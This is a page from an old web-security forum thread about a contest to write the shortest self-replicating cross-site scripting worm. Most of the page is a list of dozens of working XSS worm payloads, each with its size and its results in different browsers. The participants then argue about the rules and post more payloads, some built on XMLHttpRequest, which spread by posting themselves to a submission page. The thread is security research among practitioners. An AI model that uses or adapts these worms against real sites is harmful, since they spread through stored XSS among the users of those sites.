<script>function p() {alert("xss");x=new XMLHttpRequest;x.open("post","post.php");x.send("content=<script>" + p.valueOf() + "p()<\/script>");}p()</script>


sdc - 161 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">


ma1 - 164 (works with opera and safari also) Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src="/" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,158)))">


ma1 - 163 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">


sdc (via dev80) - 142 Doesn't work in Firefox 2.0.0.11
<script>function p(){with(XMLHttpRequest)open("post","past.php"),send("content=<script>"+p.valueOf(alert('xss'))+"p()<\/script>")}p()</script>


dev80 - 145 Doesn't work in Firefox 2.0.0.11
<script>function p() {x=new XMLHttpRequest;x.open("post","past.htm");x.send("content=<script>" + p.valueOf() + "p()<\/script>");}p()</script>


ma1 (via sdc) - 158 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(0,148)))</script>


barbarianbob - 171 Works in FF with no growth but doesn't work in IE7.0
<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>


sdc - 145 Doesn't work in Firefox 2.0.0.11
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</SCRIPT>


sdc (via ronald) - 103 Grows
<input name="content"><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>


sdc (via spyware) - 159 Doesn't work in Firefox 2.0.0.11
<form method="POST" name="content" action="post.php"><img src="." onError="content.value=document.content.innerHTML+alert('xss');javascript:content.submit();">


spyware - 149 Doesn't work in Firefox 2.0.0.11
<form method=POST name=content action=post.php <img src=. onError=content.value=document.content.innerHTML+alert('xss');javascript:content.submit();>


ronald - 142 Grows
<form method=post action=post.php name=i><input name=content><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>


ronald - 139 Grows
<form method=post action=post.php name=i><input name=content><script>i.content.value=document.i.innerHTML+alert('xss');i.submit();</script>


ronald - 142 Grows
<form method=post action=post.php name=i><input name=content><script>content.value=document.body.i.innerHTML+alert('xss');i.submit();</script>


spyware - 116 Doesn't work in Firefox 2.0.0.11
<form name=o action=post.php <img src=. onError=o.value=document.body.innerHTML+alert('xss');javascript:o.submit();>


gareth - 229 Doesn't work in Firefox 2.0.0.11 (double encoded)
<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>



gareth - 206 Doesn't work in Firefox 2.0.0.11
<script>(function(){alert('XSS');with(document)write('<form method=post action=post.php><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>'),forms[0].submit()})()</script>


Ronald - 139 Grows
<form method=post action=post.php name=i><input name=content><script>content.value=document.body.innerHTML+alert('xss');i.submit();</script>


gareth - 164 Doesn't work in Firefox 2.0.0.11 (double encoded)
<form><input name=content type=image onerror="with(form)action=(method='post')+'.php',i=escape('<form>'+innerHTML);value=i;type='hidden';alert('XSS');submit()" src>


ronald - 119 Grows
<form name="i"><input name="content"><marquee onstart="content.value=document.body.innerHTML+alert('xss');i.submit();">


ronald - 107 Grows
<form name=content><marquee onstart="content.value=document.body.innerHTML+alert('xss');content.submit();">


gareth - 167 Doesn't work in Firefox 2.0.0.11 (double encoded) if you remove escape it shrinks, but does not work in IE7.0
<form><input name=content type=image onerror="f=form;i=f.innerHTML;type='hidden';alert('XSS');f.action=(f.method='post')+'.php';value=escape('<form>'+i);submit()" src>


gareth - 222 Doesn't work in Firefox 2.0.0.11 (double encoded)
<form><input name=content type=image onerror="f=this.form;i=f.innerHTML.replace(/(.*)/,'<form>$1</form>');this.type='hidden';alert('XSS');f.action='post.php';f.method='post';f.content.value=escape(i);submit()" src=></form>



spikeman - 143 Doesn't work in Firefox 2.0.0.11
<form id=z><input name=content><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>


ronald - 81 Grows
<script>f.content.value=document.body.innerHTML+alert("xss");f.submit();</script>


bwb labs - 168 Doesn't work in Firefox 2.0.0.11
<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>


bwb labs - 193 Doesn't work in Firefox 2.0.0.11
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>


sdc - 145 Doesn't work in Firefox 2.0.0.11
<form id=z><input name="content"><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>


sdc - 159 Doesn't work in Firefox 2.0.0.11
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,148)))</SCRIPT>


ritz - 162 Works in FF with no growth but does not work in IE7.0
<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,155);click()" type="image">


sdc (barbarianbob) - 178 Works in FF with no growth but stops working in IE7.0 after first iteration
<b><form action="post.php" method="post"><img src="." onerror="alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()"><input name="content"></form></b>


barbarianbob - 165 Grows
<b<form action=post.php method=post><img src=. onerror=alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form</b>


ritz - 176 Doesn't work in Firefox 2.0.0.11
<b><img onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src="">
<form><input name="content"></form></b>


ma1 - 181 Works in FF with no growth and shrinks in IE7.0!!!
<b><img onerror="alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src=""><form><input name="content"></form></b>


ritz - 187 Works in FF with no growth and shrinks in IE7.0!!!
<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>


ritz - 181 Doesn't work in Firefox 2.0.0.11
<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()">
<form method=post action=post.php><input name=content></form></b>


.mario - 166 Doesn't work in Firefox 2.0.0.11
<b<img src=m onerror=alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form</b



ma1 - 173 Grows
<b><form method=post action=post.php><img src=. onerror=alert('xss');with(this.parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form></b>


bwb labs - 188 Works in FF with no growth and shrinks in IE7.0!!!
<b><img onerror="alert('xss');n=(m=this.parentNode).lastChild;n[0].value='<b>'+m.innerHTML+'</b>';n.submit()" src=""><form action="post.php" method="post"><input name="content"></form></b>


ma1 - 174 Grows
<b><img src=. onerror=alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form></b>


ritz - 191 Grows
<s><img src=. onerror="alert('xss');f=this.nextSibling;f.firstChild.value='<s>'+this.parentNode.innerHTML+'</s>';f.submit()">
<form method=post action=post.php><input name=content></form></s>


arantius - 178 Breaks DOM knowledge rule
<p><form method=post action=post.php><input name=content><script>alert('XSS');F=document.forms;f=F[F.length-1];
f.content.value='<p>'+f.parentNode.innerHTML;f.submit();</script>


barbarianbob - 185 Grows
<b><img src onerror="alert('xss');n=(m=this.parentNode).lastChild;n.content.value='<b>'+m.innerHTML+'</b>';n.submit()"
<form method=post action=post.php><input name=content></form></b>



ritz - 194 Grows
<i><img src=. onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>


.mario - 150 Grows
<form method=post action=post.php><img src=x onerror=i=this.parentNode;i.lastChild.value=i.parentNode.innerHTML;i.submit()><input name=content></form>


ritz - 196 Doesn't work in Firefox 2.0.0.11
<i><img src="/" onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>


ritz - 195 Doesn't work in Firefox 2.0.0.11
<i><img src="/" onerror=alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>


matt preston - 223 Doesn't work in Firefox 2.0.0.11
<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>


gareth - 265 Doesn't work in Firefox 2.0.0.11
<script>function(){alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURIComponent(a)+' name=content></form>');this.onload=function(){document.f.submit()}}()</script>


digi7al64 - 266 Doesn't work in Firefox 2.0.0.11
<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 10, 2008 05:15PM

*RSnake, you said I was 'so close'. That is not the case, that vector requires user interaction.

Cheers Ma1 and SirDarckcat!



Edited 1 time(s). Last edit at 01/10/2008 05:16PM by Spyware.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 05:23PM

It required user interaction but then on the second propagation it didn't... it was closer than a lot of others of it's kind. Anyway, don't take my comments to heart, it was more so I could keep them straight in my head. I have no idea how many worms that ended up being but I was getting pretty tired about half way through it.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 10, 2008 05:28PM

I don't blame you :), it's a lotta worm for one guy to handle. Anyway, maybe you should post the traffic log of this board, to compare traffic before and during the contest :P. The amount of views and posts is ridiculous!

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 05:30PM

Quote

.mario -154 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"

huh? i tested several time - in how far does this one (and several other slice-using ones) not work on IE7?

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 05:32PM

Hahah, id will have to do that when he gets some spare time. I think it did go up, but I have no idea how much.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 10, 2008 05:32PM

not to brag or anything but I believe I submitted the largest non working vector!

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 05:35PM

.mario - I have no idea why it doesn't work, but when I close the iframe it gives me this error

'_.0' is null or undefined

I was getting that error a lot with parentnode in IE7.0

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 05:41PM

I am pretty much clueless what to say right now without making myself a laughing stock but this vector works like a shine.

IE 5.5
IE 6
IE 7.0.5730.11
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) 
Opera 9.25.8827

This is what I tested with:
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body>
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"
</body>
</html>

My test script which is exactly the same as yours + the judges by SDC just confirm it works.

Anyway - whatever. Congrats to ma1 and SDC.

Pretty much baffled greetings,
.mario



Edited 2 time(s). Last edit at 01/10/2008 05:46PM by .mario.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 05:42PM

.mario - maybe you need something around your worm to start it? I started it on a blank page other than the worm (to simulate both - must propagate in both environments, with and without content on the page). Maybe that has something to do with it?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 05:53PM

Quote

maybe you need something around your worm to start it?

WTF!? It was never said to make the worm work on a blank site - otherwise we all could have used the <form id=m>with(m) option (equals quirksmode) - sure the worm needs at least a body tag to work - if this wasn't supposed to be it should have been mentioned (parentNode throws an error w/o body tag - what a wonder! I think we discussed way more circumstantial stuff in this thread...



Edited 3 time(s). Last edit at 01/10/2008 05:57PM by .mario.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 10, 2008 05:58PM

@.mario

it was discussed a number of times in the thread that the worm should be able to run with no other code on the page other then itself.

rsnake also stated that url decoding would occur meaning the + would have been converted to blank spaces which on my test rig also made yours fail (which was later recanted).

eitherway, don't take it to heart, nobody got a prize, its was all for shits and giggles and we probably all learnt something on the way and it there was 1 lesson to learn from this episode is that we all work together to define competition rules before we actually start the next competition... oh and we should have 1 unique url to test our code.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/10/2008 06:04PM by digi7al64.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 10, 2008 05:59PM

How plausible is it that we encounter a website with injection possibilities that has no <body> tag? I think that chance is very, very slim.

EDIT: Don't get me wrong, I like the contest AND the results. I just want to state I see where Mario is going.



Edited 1 time(s). Last edit at 01/10/2008 06:05PM by Spyware.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 06:03PM

Whatever.

over and out,
.mario

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 06:10PM

@.mario - I think this falls under the "must not use knowledge of the DOM unless you name a class or and id and use the class or id. No looking for the n-th script on the page as that will change from site to site". Maybe I wasn't clear about this, but I thought I had made it clear that you shouldn't rely on anything (hence the DOCTYPE discussion and body=onload discussions - where you never know what's going to be on the page.

@Spyware - this is applicable is things like response splitting (granted that's not very often stored XSS, unless you are talking about injecting into proxies).

I hope no one got hurt over this, the whole point of the contest was to get diminutive worms. We have a winner that fit the criteria and many others who fit in other use cases. That's not a bad thing IMHO.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: thrill
Date: January 10, 2008 06:14PM

Quote

it's a lotta worm for one guy to handle.

Good thing rsnake has id to help out with large worms.. ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: krazl
Date: January 10, 2008 08:35PM

Rsnake,

Is it true we just create post.php file and put this code and run? It seems a infinite loop to me. I can't get the clear picture how worm propargate itself.. Please explain. thx in advance.

i'm noob,
krazl
www.krazl.com

http://www.krazl.com

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 09:08PM

It will be an infinite loop for you, unless the worm uses XMLHttpRequest. The point isn't so much that it's quiet, but that it propagates. It posts itself to post.php which would then be viewed by someone else, and so on. We are using reflected XSS as an example but in reality it would be stored. So if you were the victim you'd start on some one else's view.php which had the vector, which posted to post.php which would then put that vector on your version of view.php and someone else would view it and post it to theirs and so on. Make sense?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 10, 2008 11:25PM

A few notes on the testing, note that I was mostly interested in (my own & shorter) XMLHttpRequest methods:
Quote
rsnake
bwb labs - 254 Grows
<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),setRequestHeader('Content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>
bwb labs - 253 Doesn't work in Firefox 2.0.0.11
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>
bwb labs - 256 Doesn't work in Firefox 2.0.0.11
<img src=. alt="alert('XSS');with(new XMLHttpRequest){open('post','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))}" onerror=eval(alt)>
I tested all my vectors, all work on Firefox 2.0.0.11, Internet Explorer 7, Opera 9.5 and Safari 3.0.4, and all without growing pains.


Quote
rsnake
ma1 - 209 Works in FF with no growth but doesn't work in IE7.0
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),206)))"
Works in my FF2 & IE7 on the judge page. It's a surprising vector that works (on these two browsers). Lucky thing that the encoding isn't a problem (so just avoiding &+ seems to be enough). Note: both Opera 9.5 & Safari 3.0.4 translate the <b> in the innerHTML to &gt;b&lt; which's breaking the slice.


So that makes my XMLHttpRequest vectors (251 & 254 bytes) at least the smallest cross browser vectors ;-).

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 11, 2008 05:04AM

All in all I really enjoyed the contest and it was great to compete with some fantastic coders :) More please!!!

There were a couple of issues though which I'd like to point out:-
1. Rules should be static and discussed before the contest begins.
2. 2 Forums should be used 1 for discussion and 1 for entry.
3. The entry forum should only allow 1 post per user and the user updates their post with multiple entries.
4. A demo testing site should be created which allows a coder to test for the rules.
5. Time limit should be decreased to help the hackaholics.
6. Mario won. :P

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 11, 2008 05:46AM

@.mario

The worm had to run standalone because the next page (post.php) could be doctypeless and only a simple PHP page where any doctype sensitive worm would perish. e.g. like I said a dozen times: only #ID selectors would fail as a worm, so that ruled out 80% of all vectors.

@RSnake

Since the rules were as least to say 'vague' this thread could have been about 40% smaller IMO, so don't blame us for the faulty vectors, it was due to absent /incomplete rules c.q. faulty interpetations, largely hardly our coding mistake, with a few exceptions that is.

Anyway, it was nice!

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: DoctorDan
Date: January 11, 2008 05:48AM

Woo, that was a lot of fun. I learned quite a bit, so I definitely consider this a worthwhile contest. Congrats to ma1 and SDK! I hope we do more community things like this in the future.

-Dan

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 11, 2008 06:06AM

RSnake u said this one works on both: (it's mine 203XHR btw)

<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

But that's impossible due to the + which becomes a space, I hope you considered the + issue in combination with innerHTML?
for brevity, is important that one checks the response one get from the post.php page.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Date: January 11, 2008 06:09AM

Dear RSnake n Pals,
thanx 4 the informative contest on the DIMU XSS worm
I still wanna post a "text book type" code on the same which should work

<script>document.write('<form action=post.php method=post name=t><input value="<script>alert('XSS')</script>" name=content></form>');onload=document.t.submit()></script>

Roughly 169 bytes..
Anycomments anyone ???

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 11, 2008 06:10AM

@Gareth: I definitely like your ideas for the next contest - although I think it'd be difficult to mod phorum to just allow one submission per user for certain threads. Also it would lead to the problem that everyone submits five minutes before the contest ends. Plus the learning effect would be narrowed. (can we automatically apply suggestion 6 next time? *g*)

@Ronald: I partially agree. No DOCTYPE: Yes! But: The problem was that the rule that no body tag needs to be existent wasn't communicated clearly enough. It was kind of given by the 'no DOM knowledge rule' but hard to interpret.

@Dan & RSnake: Yep - more of that kind of stuff please.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 11, 2008 06:26AM

Another thing that bothered me slightly was the following doesn't break the DOM rule because the form would be the only one on the page e.g.:-

<body>
<b>This gets replaced</b>
<script>
document.body.innerHTML='<form>';
document.forms[0].submit();
</script>
</body>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 11, 2008 08:48AM

@bwb labs - I may have quickly skimmed over a few of those because of the src=. (I didn't see you were sending the period through XHR). Whoops! I was trying to eyeball some of them to speed up the testing process (it took me four hours to test the nearly 200 submissions!).

@Gareth - I completely agree with the future way to run this contest (live and learn). I honestly wasn't expecting quite this flurry. I was expecting maybe five or ten posts total. I had no idea so many people would get into this. And yes, I agree, in _most_ circumstances, .mario did win. I sent him an email to say as much too. Had I been more clear I think we would have ended up with a different vector too! But that's all a side effect of the real goal of this challenge (to get some sample worm code without the garbage) and that we did!

@Ronald - I may have missed that (can't test from here due to my stupid cut and paste problem). I did check the responses, but I also had over 200 worms to test, so I may have missed a few small issues here or there.

@.mario - Thanks for understanding, you definitely pushed the envelope in this contest, and I have no doubt you would have had one of the top submissions had I been more clear with the rules.

@Gareth Heyes - regarding that code, what if there is no body (nothing but the code)?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: thornmaker
Date: January 11, 2008 09:15AM

rsnake Wrote:
-------------------------------------------------------
> @Gareth Heyes - regarding that code, what if there
> is no body (nothing but the code)?

you mean, like in the matrix?

s/body/spoon/

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 11, 2008 09:23AM

ghehe

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 11, 2008 09:38AM

I've been using your bodies as batteries for too long - you know too much!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Pages: PreviousFirst...1011121314151617181920Next
Current Page: 19 of 20


Sorry, only registered users may post in this forum.